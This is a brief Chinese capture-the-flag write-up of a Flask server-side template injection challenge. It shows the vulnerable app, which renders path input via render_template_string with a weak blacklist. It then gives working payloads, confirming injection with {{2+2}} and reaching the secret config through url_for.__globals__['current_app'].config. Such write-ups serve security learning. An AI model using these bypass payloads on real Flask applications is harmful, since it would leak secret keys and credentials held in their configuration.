题目描述如下：

这是一段python代码，直接查看页面源代码。

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>') //描述路径
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')  //把括号过滤
        blacklist = ['config', 'self']       //config和self为黑名单
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

 根据shrine的路径，构建payload:http://111.200.241.244:53756/shrine/%7B%7B2+2%7D%7D即（靶机IP地址/shine/{{2+2}}），确认存在模板注入。

常规的想法， 利用{undefined{config}}查看app.config内容，但源代码中过滤了config。

因此构建其他payload: http://111.200.241.244:53756/shrine/%7B%7Burl_for.__globals__%7D%7D，采用{{url_for.__globals__}}

 

{{url_for.__globals__['current_app'].config}}